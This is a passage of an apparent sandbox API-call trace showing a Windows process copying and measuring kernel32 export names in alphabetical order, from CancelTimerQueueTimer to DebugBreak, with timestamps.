lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.706] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.707] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.707] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.707] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.707] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.707] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.707] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.707] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.707] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.707] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.707] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.707] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.707] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.707] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.707] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.707] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.707] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.707] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.708] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.708] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.708] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.708] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.708] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.708] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.708] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.708] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.708] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.708] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.708] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.708] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.708] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.708] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.708] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.708] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.708] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.708] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.708] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.708] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.709] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.709] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.709] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.709] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.709] lstrlenA (lpString="COPYFILEA") returned 9 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.709] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.709] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.709] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.709] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.709] lstrlenA (lpString="COPYFILEW") returned 9 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.709] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.709] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.709] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.709] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.709] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.709] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.709] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.709] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.709] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.710] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.710] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.710] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.710] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.710] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.710] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.710] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.710] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.710] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.710] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.710] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.710] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.710] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.710] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.710] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.710] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.710] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.711] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.711] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.711] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.711] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.711] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.711] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.711] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.711] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.711] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.711] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.711] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.711] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.711] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.711] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.711] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.711] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.711] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.711] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.711] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.711] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.712] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.712] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.712] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.712] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.712] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.712] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.712] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.712] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.712] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.712] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.712] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.712] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.712] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.712] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.712] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.712] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.712] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.712] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.712] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.713] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.713] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.713] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.713] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.713] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.713] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.713] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.713] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.713] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.713] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.713] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.713] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.713] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.713] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.713] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.713] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.713] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.713] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.713] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.713] 